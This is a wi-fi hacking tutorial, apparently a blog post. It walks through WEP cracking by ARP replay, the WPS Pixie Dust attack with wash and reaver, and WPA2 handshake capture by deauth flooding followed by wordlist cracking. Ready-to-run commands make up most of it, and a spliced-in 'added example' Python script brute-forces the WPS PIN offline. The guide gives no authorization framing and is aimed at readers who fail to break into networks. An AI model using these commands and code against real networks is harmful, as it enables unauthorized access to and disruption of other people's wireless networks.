It’s common practice for aspiring hackers, these days, to commit to memory a few decent how-to hack guides and hit the field. There’s really nothing wrong with this because you have to start somewhere.
But this guide on how to hack wi-fi is meant for those who are frustrated at their lack of success hacking into wireless networks and are considering just breaking into the place and hooking an RJ45 cable up to the router.
Don’t do that.
Instead, let me share a bit of salty wisdom I’ve gathered the hard way, so you don’t have to.
This guide is all about applying a methodology to your madness.
Rookie pentesters waste a lot of time in the field simply because of their order of operations.
I prefer to gather fruit starting at ground level and work my way up. This tactic of grabbing the ‘lowest hanging fruit’ will allow you to prioritize your exploits and see results sooner.
It’s exactly what it sounds like, too.
Go after the easiest targets first, then the next level, and the next level, and so on.
Let’s get started.
I could say that Open Networks are the obvious ground-level targets, and that would be mostly true. But, this guide is about hacking into wireless networks. Walking through the door isn’t so much breaking in.
So, let’s talk about an old dinosaur first…
You may never actually see one in the wild, depending on where you live, but you do need to add this to your repertoire. Lacking this knowledge is like mastering Linear Algebra but really sucking at long division.
It’s just silly not to know this.
So, sweep #1 is for WEP networks.
Retrieving the key for a WEP network can be done a few ways, but I’m going to outline my personal favorite.
Assuming I’m within range (a signal of roughly -70 dBm or better in the PWR column of airodump-ng), this attack can be done in 5-10 minutes, or less in special cases.
All of the attacks in this guide begin with starting a monitor interface, so I’m only going to mention it once.
If you’re on Kali, the best way to do this is:
airmon-ng check kill; airmon-ng start wlan0
A quick explanation:
‘airmon-ng check kill’ stops networking processes that can get in the way of channel hopping and some other vital monitor functions. The latter part of the command takes down the wireless interface and replaces it with a monitor interface. In current (Kali-Rolling, 2017.1) versions of Kali, it will bring up an interface called wlan0mon (or wlan1mon, wlan2mon, etc…).
Next, let’s start capturing traffic to/from our target, we’ll need this information when we execute the crack:
airodump-ng --bssid <BSSID> -c <CHANNEL> -w <capture_prefix> wlan0mon
This command starts airodump-ng listening on the target channel, focused on the target AP’s BSSID (mac address), and writes the packets to a file.
In another tab/terminal window, we’ll need to fake authentication with the AP in order to set up the Arp Replay attack that will follow.
To do this, we’ll run:
aireplay-ng --fakeauth 6 -a <BSSID> wlan0mon
By not specifying a source MAC address (-h), aireplay-ng uses our interface’s own MAC by default. The ‘6’ after --fakeauth is the delay in seconds between re-association attempts (0 would mean a single attempt); 6 is a good default for future reference.
Next up, the bulk of the attack:
aireplay-ng -3 -b <BSSID> wlan0mon
Note that for this attack the AP’s BSSID is passed with -b. If your injected frames are being ignored, add -h with the same MAC you used for the fake authentication, since the AP will only relay traffic from an associated station.
The fabulous Arp Replay attack.
My explanation won’t do it justice, but according to the Aircrack-ng website:
The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IV. It is all these new IVs which allow you to determine the WEP key.
Pretty awesome, right?
So, we’re listening for ARP packets, replaying them back to the AP (the AP accepts because of the Fake Auth attack), grabbing the new IVs, and repeating until we have plenty of data to work with.
Keep an eye on the ‘data’ column in airodump-ng, we’re going to start the last leg of the attack when that number reaches ~10,000. That is usually enough for a 64-bit key; 128-bit keys can take several tens of thousands of IVs, so just let the replay keep running.
When it does, open another tab and run:
aircrack-ng <capture_prefix>-01.cap
You pass the .cap file airodump-ng is writing to aircrack-ng. Left running against a growing capture, aircrack-ng re-attempts the crack roughly every 5,000 new IVs. At this point your attack is on auto-pilot, so just sit back and watch the magic happen.
Let’s move on to the slightly higher-up fruit.
The Pixie Dust Attack
I’m not sure you could’ve chosen a more ridiculous name for this attack, but I love it none-the-less.
This attack exploits a weakness in WPS authentication (that fancy push button / PIN feature on printers and many other things), namely the weak pseudo-random number generators (PRNG) that certain AP chipsets use to generate the secret nonces (E-S1 and E-S2) in the WPS key exchange.
To sum it up: the AP proves it knows the PIN by sending two hashes, E-Hash1 and E-Hash2, each covering one half of the PIN (as PSK1 and PSK2) together with one of those nonces. If the nonces are predictable or simply zero, we can capture the exchange and brute-force each half of the PIN offline: at most 10,000 guesses for the first four digits and 1,000 for the last three (the eighth digit is a checksum). With the PIN in hand, the AP hands over the WPA key. Practical application is as easy as first scanning for WPS-enabled APs:
wash -i wlan0mon
This will output the BSSIDs, channels, WPS versions, and WPS status of every AP in range. We’ll need to copy the BSSID and channel, and run a lovely tool called Reaver:
reaver -i wlan0mon -vvv -K 1 -b <BSSID> -c <CHANNEL>
Without going into great detail, this command begins the Pixie Dust attack (the -K 1 option). You should see pretty quick results with this command. The attack works in seconds on APs that are within reasonable range and using a vulnerable chipset.
Always use this attack as part of your process. Always.
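To make the offline part of the attack concrete, here is an added example (my own illustration, not code from this guide, reaver or pixiewps) of the PIN recovery step. It assumes the attacker has already pulled AuthKey, the Diffie-Hellman public keys PKE and PKR, and E-Hash1/E-Hash2 from the sniffed WPS messages; all of those values are constructed here from fixed labels so the script runs offline and deterministically. It also assumes the Ralink-style weakness where E-S1 and E-S2 are all zero, which is the simplest vulnerable case.

```python
import hashlib
import hmac

# Constructed stand-ins for values an attacker captures from the M1-M3
# WPS messages. Derived from fixed labels so the example is deterministic.
AUTHKEY = hashlib.sha256(b"example-authkey").digest()             # 32 bytes
PKE = hashlib.shake_256(b"example-enrollee-pubkey").digest(192)   # 192 bytes
PKR = hashlib.shake_256(b"example-registrar-pubkey").digest(192)  # 192 bytes
# Assumed weakness (Ralink-style): the "secret" nonces are all zero,
# so the attacker knows them without guessing.
E_S1 = bytes(16)
E_S2 = bytes(16)


def wps_pin_checksum(pin7: int) -> int:
    """Checksum digit (8th digit) for a 7-digit WPS PIN body."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def psk_half(authkey: bytes, pin_half: bytes) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, half of the PIN)."""
    return hmac.new(authkey, pin_half, hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, es: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-Sx || PSKx || PKE || PKR)."""
    return hmac.new(authkey, es + psk + pke + pkr, hashlib.sha256).digest()


def enrollee_hashes(pin: str, authkey, pke, pkr, es1, es2):
    """Constructed: the two hashes a (vulnerable) AP would send in M3 for this PIN."""
    eh1 = e_hash(authkey, es1, psk_half(authkey, pin[:4].encode()), pke, pkr)
    eh2 = e_hash(authkey, es2, psk_half(authkey, pin[4:].encode()), pke, pkr)
    return eh1, eh2


def recover_pin(authkey, pke, pkr, es1, es2, ehash1, ehash2):
    """Offline brute force: <= 10^4 tries for the first half, <= 10^3 for the second."""
    first = None
    for i in range(10_000):
        cand = f"{i:04d}".encode()
        if e_hash(authkey, es1, psk_half(authkey, cand), pke, pkr) == ehash1:
            first = cand
            break
    if first is None:
        return None
    # Second half: three free digits plus the checksum digit (spec-compliant PINs).
    for j in range(1_000):
        body = int(first.decode() + f"{j:03d}")
        cand = f"{j:03d}{wps_pin_checksum(body)}".encode()
        if e_hash(authkey, es2, psk_half(authkey, cand), pke, pkr) == ehash2:
            return (first + cand).decode()
    return None


def demo(pin: str = "12345670"):
    """Simulate the capture for a known PIN, then recover it the way Pixie Dust does."""
    eh1, eh2 = enrollee_hashes(pin, AUTHKEY, PKE, PKR, E_S1, E_S2)
    return recover_pin(AUTHKEY, PKE, PKR, E_S1, E_S2, eh1, eh2)


if __name__ == "__main__":
    print("recovered PIN:", demo())
```

The whole search is about 11,000 HMACs, which is why the attack finishes in seconds once the nonces are known. Some APs ignore the checksum rule; if the second loop comes up empty against a real target, widen it to all 10,000 four-digit endings.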
Many of you probably like to use Wifite to automate this type of attack. That’s well and good, those guys deserve credit for a terrific project, but there are some pitfalls I’ve noticed in the field.
Namely, the occurrence of false negatives concerning WPS status. Nearly 25% of the time, Wifite reports WPS as disabled when it is actually enabled and vulnerable.
So, stick to the manual wash/reaver method where possible.
The Most Boring Fruit
I barely even want to mention this attack because of how boring and fraught with failure it is. But, in the interest of being thorough, I often include it as a sidebar tactic in my own pentests. So, I’ll go over it briefly here.
How to crack WPA2 the hard way:
airodump-ng --bssid <BSSID> -c <CHANNEL> -w <capture_prefix> wlan0mon
Again, let’s fire up airodump-ng and start capturing packets.
The next step utilizes aireplay-ng to be a real Debbie Downer and DoS some WiFi:
aireplay-ng --deauth 20 -a <BSSID> wlan0mon
This sends deauth frames spoofed from the AP to the broadcast address, kicking off every client connected to it. It is much more effective as a sniper tactic, targeting a single client (add -c with the client’s MAC address). But, the broadcast version above is ok in a pinch.
You’ll have the most success with this attack by doing small bursts (the above example sends 20 packets, that is plenty in many cases) and waiting a minute or so before repeating. You want to give clients a chance to re-authenticate and complete those juicy 4-way-handshakes we’re looking for. After waiting for a few good handshakes, we can move on to cracking the key.
There are way too many ways to do this to include here, so I’ll just show you the most commonly used:
pyrit -r <capture>.cap -i <wordlist> attack_passthrough
This is by no means the quickest method, but unless you are rocking some awesome GPUs, we’re just splitting hairs by comparing the different methods. Don’t limit yourself to aircrack-ng for this, though; pyrit is no longer maintained, and hashcat against a handshake converted to its hccapx/22000 format is the current standard if you do have a GPU. Aside from the speed of your GPU/CPU, your wordlist is a crucial factor for success. I always start with rockyou.txt, a common password list (on Kali it ships as /usr/share/wordlists/rockyou.txt.gz, so gunzip it first):
find / | grep rockyou
Pick a location and start cracking.
Priority is Everything
These are the basic attacks any hacker should have in their arsenal. I purposefully left out social engineering / spoofing attacks (Evil Twin AP, etc…), they belong in their own guide.
The final tool I’ll leave you with is probably the most overlooked: proper planning.
Going out in the field and attacking everything in every way is a great way to waste time and get nothing accomplished.
Scope out the area, run Kismet & Wash on your first outing and review the results at home.
Identify the lowest hanging fruit and start there.
Remember, getting in is only the beginning. There’s no shame in going the easy route.